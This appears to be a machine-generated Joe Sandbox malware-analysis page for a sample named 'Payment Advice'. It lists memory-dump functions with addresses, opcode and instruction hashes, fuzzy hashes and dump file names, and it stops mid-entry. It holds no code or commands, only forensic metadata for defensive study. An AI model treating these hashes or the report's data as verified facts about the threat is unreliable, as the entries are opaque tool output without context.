                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e1dc8e327198d6b317e3de65eadb21226e9ffd6f2c22b0aaee69f1ecd19761f
                                                                                      • Instruction ID: 76b97a7f3a9675262310e5ce216c7f2298adb205e0041eee8e124dfcd023b817
                                                                                      • Opcode Fuzzy Hash: 0e1dc8e327198d6b317e3de65eadb21226e9ffd6f2c22b0aaee69f1ecd19761f
                                                                                      • Instruction Fuzzy Hash: 4141B3F0906219DFEB00DF58EA85F99BBB5FB85344F0192A5E4099B315DB709C81CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A3A6C Relevance: .1, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2260a37ab4efe9da73e0d93a987556724e95c6911f8f05b8b8d49be5d9e93ed6
                                                                                      • Instruction ID: 33aba45ed117c85257e2a4c2afbeeb9f450df746606f4863067340c67a100ce7
                                                                                      • Opcode Fuzzy Hash: 2260a37ab4efe9da73e0d93a987556724e95c6911f8f05b8b8d49be5d9e93ed6
                                                                                      • Instruction Fuzzy Hash: 5021EDB0B00349ABDB15EF78889847FBBF7EBC82A07544A29E819D7380EE30CD058751
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ACBC3 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c2be57f632009a028dbd4f0ce2422c85a208c70c425dfbac3cc4bb849f9853f
                                                                                      • Instruction ID: 3aab8d7c190f75c9d0b0e378060e4c3884940551a81b3f092d5d69087e235bee
                                                                                      • Opcode Fuzzy Hash: 6c2be57f632009a028dbd4f0ce2422c85a208c70c425dfbac3cc4bb849f9853f
                                                                                      • Instruction Fuzzy Hash: BB319AB0918348EFDB06CF65C4445EDBFF2AF8E301F1491AAE409AB251DB359941CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0108D06C Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1705668806.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_108d000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ebe3acd33aaaf3bee7fe6864f2b7ad51c9cac7bb66f744020cbeb9e8391f6a27
                                                                                      • Instruction ID: 5cb9c4a9f4eef1732d59c4b5ed4e7e6b25a9983be378ad88c6823d737aaac095
                                                                                      • Opcode Fuzzy Hash: ebe3acd33aaaf3bee7fe6864f2b7ad51c9cac7bb66f744020cbeb9e8391f6a27
                                                                                      • Instruction Fuzzy Hash: 0F213871508200EFCF05EF94D9C0B1ABFA5FB88314F20C2A9E9890B296C33AC416CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ABF08 Relevance: .1, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 88f84ae2a72869a7a357e2fc765cd764c9b71dea91839374a940884ba077d7a8
                                                                                      • Instruction ID: 610b88a32fe215ae5932346101ddb4d767f898ed1294d063b3cc936aeb45e981
                                                                                      • Opcode Fuzzy Hash: 88f84ae2a72869a7a357e2fc765cd764c9b71dea91839374a940884ba077d7a8
                                                                                      • Instruction Fuzzy Hash: 6121C0F4E19249EFDB05DFA4D4405ACBFB5EB8A341F1492EAE8189B221C7309A41CF40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 010AD01C Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1706045888.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10ad000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 47af41f349465940c8ee6380f6f7b63844361b1a9987086bf2ac3393a4f40952
                                                                                      • Instruction ID: a394bdec24fd34dcf07a563ff8b7bab4a96f9e3cdcf7465e05bc7103dcf7e868
                                                                                      • Opcode Fuzzy Hash: 47af41f349465940c8ee6380f6f7b63844361b1a9987086bf2ac3393a4f40952
                                                                                      • Instruction Fuzzy Hash: 8A214570184200DFCB11DF98D980F16BFA1EB84314F60C5ADE8894B656C336C407CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 010AD2F0 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1706045888.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10ad000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fd85db913721c5cea3d6be1db8a3575cb72946dfca64de4efdb4694720149f9b
                                                                                      • Instruction ID: 43f1ccadf3c0131ac30578ce9298cca9afb63ec23c12da3bcbc8e9e936d6ff3b
                                                                                      • Opcode Fuzzy Hash: fd85db913721c5cea3d6be1db8a3575cb72946dfca64de4efdb4694720149f9b
                                                                                      • Instruction Fuzzy Hash: 482134B2604200DFCB01DFA8D9C0B2ABFA5FB84314F60C5ADE8894B656C33AD446CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ACB43 Relevance: .1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1bb86b1f07193209cacd6e8b963cb50d2711d678fb618e37f8bfae982903c5f9
                                                                                      • Instruction ID: 85ab6ce01dc1aa2dbbdcae518522234352d7e8f81915f43192841274d0087118
                                                                                      • Opcode Fuzzy Hash: 1bb86b1f07193209cacd6e8b963cb50d2711d678fb618e37f8bfae982903c5f9
                                                                                      • Instruction Fuzzy Hash: 482128B0D09348DFDB06CFA9C5445EDBFF2AF8A210F1481AAE404EB252E7354A81CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A3C0C Relevance: .1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 917db571f3c7cfa7bb89a94e275acec54b9e978586caae557d8383b3d4bc275d
                                                                                      • Instruction ID: b4ebf63035772a1bba4cf20febc3eaae3008203237a72e1649d39bf983d0a9e8
                                                                                      • Opcode Fuzzy Hash: 917db571f3c7cfa7bb89a94e275acec54b9e978586caae557d8383b3d4bc275d
                                                                                      • Instruction Fuzzy Hash: B031EEB0D01319EFEB20DF99C588B9EBBF4BB48354F248529E404BB254D7B55888CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ABB79 Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0853caa41f2a249c9cb094601318d124355faf1f4c16b02f7be976d52b7be58
                                                                                      • Instruction ID: 49303ec39e90a6a51993f870fb538fdf5c387c43c03596c5d608988a10ef4ce9
                                                                                      • Opcode Fuzzy Hash: e0853caa41f2a249c9cb094601318d124355faf1f4c16b02f7be976d52b7be58
                                                                                      • Instruction Fuzzy Hash: 5D2139F8908249DFDB40CFA9C1809EEBBF1BB8A350F205299D814A7366C730AA40CB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ACB4B Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d929b5708845e772deb9934639152a60f06a5af43b79c4af82e973142d51d6a
                                                                                      • Instruction ID: c6098a5292ba409ce56514f870e08900217491faa14a28731baa96406ebdd571
                                                                                      • Opcode Fuzzy Hash: 6d929b5708845e772deb9934639152a60f06a5af43b79c4af82e973142d51d6a
                                                                                      • Instruction Fuzzy Hash: 022139B0D09348DFDB46CFA9C4446EDBFF2AF8A310F1481AAD445AB252D7399945CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ACC47 Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b852af6e321c3c2a7ee2412eba0d05a5ad8985872d4706d1d6eb313300f3815
                                                                                      • Instruction ID: 51796298877d93cf367f95e33a6ae28196bf4d4950f668f997e4a25dd7e9e420
                                                                                      • Opcode Fuzzy Hash: 1b852af6e321c3c2a7ee2412eba0d05a5ad8985872d4706d1d6eb313300f3815
                                                                                      • Instruction Fuzzy Hash: AD11CDB0819219FFEB0ACF64C4445EDBFF9FB8A380F106A55D40AAA212D7309442CBB0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A896B Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a9eeb7bb7ea76bf20081a260317b319703f5f5c71e3b00a85d19f171f6c45a86
                                                                                      • Instruction ID: 785a741789d6061d6b163c1e389a0d6bdd5d36e0d0ec8602259125b1aa60bd47
                                                                                      • Opcode Fuzzy Hash: a9eeb7bb7ea76bf20081a260317b319703f5f5c71e3b00a85d19f171f6c45a86
                                                                                      • Instruction Fuzzy Hash: 111108B1754341FFFB2B8A158909F397B62DBC2B81F198667E4419F292C534E840C703
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 010AD006 Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1706045888.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10ad000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35670de0f1b9dc92ebdc0ffaf56e424f1bcdfd7503bcdaa6f186bc4faf47141e
                                                                                      • Instruction ID: 4e67e185a7a6971735d30270c19a9a0be15769cb5b0c81da043950a518664527
                                                                                      • Opcode Fuzzy Hash: 35670de0f1b9dc92ebdc0ffaf56e424f1bcdfd7503bcdaa6f186bc4faf47141e
                                                                                      • Instruction Fuzzy Hash: 222183755483809FCB03CF64D994B11BFB1EB46214F28C5DAD8898F6A7C33A9816CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A35F8 Relevance: .1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 043e6a6c9ff2795d4fe245a39c8466900ae8645eb8ca1ab21a3357480aa05562
                                                                                      • Instruction ID: 6823083023bea37379e867c16bd71d9fda224103fbcfca313747d7cb86afc091
                                                                                      • Opcode Fuzzy Hash: 043e6a6c9ff2795d4fe245a39c8466900ae8645eb8ca1ab21a3357480aa05562
                                                                                      • Instruction Fuzzy Hash: 1121B0B4A10908DFD748CF5AE189899BFF1FF88310F5281D4E8889B325DB71E991CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A6B3C Relevance: .1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf46a366f10cb357b5b78a0668f8add61fb39b51ce126333e7e68b5326727d19
                                                                                      • Instruction ID: 9b66b78c698de414af40eab7754efb99702ed55c5426a6872c5a0a20a46d7c02
                                                                                      • Opcode Fuzzy Hash: cf46a366f10cb357b5b78a0668f8add61fb39b51ce126333e7e68b5326727d19
                                                                                      • Instruction Fuzzy Hash: D62134B1904349DFCB10DFAAC844ADEBFF4FB49320F10852AE959A7211D778A940CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ABC31 Relevance: .1, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e5d0bc296bfebcb2739a84f932eff65863808c9f6ee124832a4355aa9e7a917f
                                                                                      • Instruction ID: 73435015c24be4e1ccea59cce439a2ded0ba196b30a9e925064dfd65d9fff560
                                                                                      • Opcode Fuzzy Hash: e5d0bc296bfebcb2739a84f932eff65863808c9f6ee124832a4355aa9e7a917f
                                                                                      • Instruction Fuzzy Hash: FF114CF0D09208EFDB05DFA8C5409EDBFF5EB8A350F1096A5E4549B266DB309A41DF81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ABB88 Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c6061d75b730ecbbfe2ba5da83731d3d08fcfd66be8005c7ccff300c9f3a3e9
                                                                                      • Instruction ID: d8d7e4921785e4b7cb30a380c8cf4692ddd8af7c955365e91aeff49e72b4e142
                                                                                      • Opcode Fuzzy Hash: 6c6061d75b730ecbbfe2ba5da83731d3d08fcfd66be8005c7ccff300c9f3a3e9
                                                                                      • Instruction Fuzzy Hash: CF21EAF4E18209DFDB44CFA9C1819AEBBF5BB8A340F209155D809A7365D730AA40CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0108D067 Relevance: .1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1705668806.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_108d000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                      • Instruction ID: b24cd91fcfb622df21eecaf0a9c5a09d091099f4bdbfd9e07182f37f2c6b1558
                                                                                      • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                      • Instruction Fuzzy Hash: BD218C76504284EFDF06DF54D9C4B16BFB2FB88314F24C6A9D9890A256C33AD426CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A59C8 Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d466c936a63db30dbea11ab177a6f6e3a0506b28feff8b83c9ff5105c3164501
                                                                                      • Instruction ID: 26b8dda6b05fd8c38800fa378563a0efa45b980eceb168059b5805b46da804d3
                                                                                      • Opcode Fuzzy Hash: d466c936a63db30dbea11ab177a6f6e3a0506b28feff8b83c9ff5105c3164501
                                                                                      • Instruction Fuzzy Hash: 9611A0B1B003569F9B15EF7998884BFBBF6EBC42A07144A29E859D7340EF3099058761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A6B50 Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0dc4678ecebd27a50013d8b0c20c2ef44a0e1e6ac6ee4c1be44ab952ecd45c74
                                                                                      • Instruction ID: bd60441778c97eac9edfb248eefa8b94ba733e314c50cccd656c1907199e9e80
                                                                                      • Opcode Fuzzy Hash: 0dc4678ecebd27a50013d8b0c20c2ef44a0e1e6ac6ee4c1be44ab952ecd45c74
                                                                                      • Instruction Fuzzy Hash: E42103B5900249AFDB20DF9AC884ADEBFF4FB49360F108429E919A7210C374A954CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AC101 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bdd7ef0ffa903615b2622e2a9b8144096d497ecab931de34270ad93394d4b25a
                                                                                      • Instruction ID: 0861a4451fc7d8745f1da7a05ec4c36436a18412c50f65ae0176d6f1229413cf
                                                                                      • Opcode Fuzzy Hash: bdd7ef0ffa903615b2622e2a9b8144096d497ecab931de34270ad93394d4b25a
                                                                                      • Instruction Fuzzy Hash: F0212CF1E046589BEB19CFAAC8447DEBEF3AFC9300F04C16AD40866264DB7405458F64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AE5B0 Relevance: .1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d92b7226f44717db3c644e596986de809ced50035477836e6720b7a512e4f101
                                                                                      • Instruction ID: 4ffb2b25a4d6005e6f2bdaa3526dc02686e46f5495d4fd8762a62046675320b5
                                                                                      • Opcode Fuzzy Hash: d92b7226f44717db3c644e596986de809ced50035477836e6720b7a512e4f101
                                                                                      • Instruction Fuzzy Hash: B1211BF4906229DFEF50DB64DA55B9CB7B2FB85244F0082E6D409A7744DB308D92CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 010AD2EB Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1706045888.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10ad000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: b424ed3f8685f0196d1014874fc7b70ffb6ddde104814668d241a738b15a6c81
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: E111DD76504280CFDB02CF98D5C4B15BFB1FB84314F24C6AAD8894B656C33AD40ACB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AE572 Relevance: .1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2a4025956b0eb20cbb0ce9b077ca6a5ee5519ac55f36da4d212b4b8bacc4452
                                                                                      • Instruction ID: 50bce7aeedc061661147770a2700107e2797a45cccc6a908af56bc069c035faa
                                                                                      • Opcode Fuzzy Hash: b2a4025956b0eb20cbb0ce9b077ca6a5ee5519ac55f36da4d212b4b8bacc4452
                                                                                      • Instruction Fuzzy Hash: C61191F5A14209DFEF04CF68E88B559BBF8FB853947142655E406D7642FBB0E800CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AE4D0 Relevance: .1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4917e2fcc763a185366c3dbd948044dad322569cd27238568634caeaa1c19628
                                                                                      • Instruction ID: 75c3293c3cc876dfc2bf32df162136feaa332db5d4e4d7208777b3e717b56c8c
                                                                                      • Opcode Fuzzy Hash: 4917e2fcc763a185366c3dbd948044dad322569cd27238568634caeaa1c19628
                                                                                      • Instruction Fuzzy Hash: FC11A9F091410DDFEB44DF68E84AAADBBF5FB8A340F018925E401A7350DBB09545CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ABC40 Relevance: .0, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c71b228f39a822b328db374cae8d9db6d1654bc5ab94690de33a27705742970
                                                                                      • Instruction ID: 361e6777b433c7447d29157307dc643c91fd191a060f048467cb3d91b12d9005
                                                                                      • Opcode Fuzzy Hash: 0c71b228f39a822b328db374cae8d9db6d1654bc5ab94690de33a27705742970
                                                                                      • Instruction Fuzzy Hash: 57110CF4D08209EFDB04DFA9C5809ADBBF9FB89350F109695D409A7321DB309A418F80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AC110 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7d071ef5d0db65fe432cf8246cb16c90d401f0db053d221af70dd2d35ac2eea
                                                                                      • Instruction ID: 109ab43a486c2b5f0cd1a2fe58c6666eec5d98ff13a5e57a6525661846a414b1
                                                                                      • Opcode Fuzzy Hash: b7d071ef5d0db65fe432cf8246cb16c90d401f0db053d221af70dd2d35ac2eea
                                                                                      • Instruction Fuzzy Hash: 3111A2B1E006189BEB18CFABD8457DEFAF6AFC9300F04C16AD80966254EB7519458FA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ACF01 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 038be20b93c5ac6362112f5f0adfa7c8366b6c0d7c90dfe9a8234fc53eaf96b8
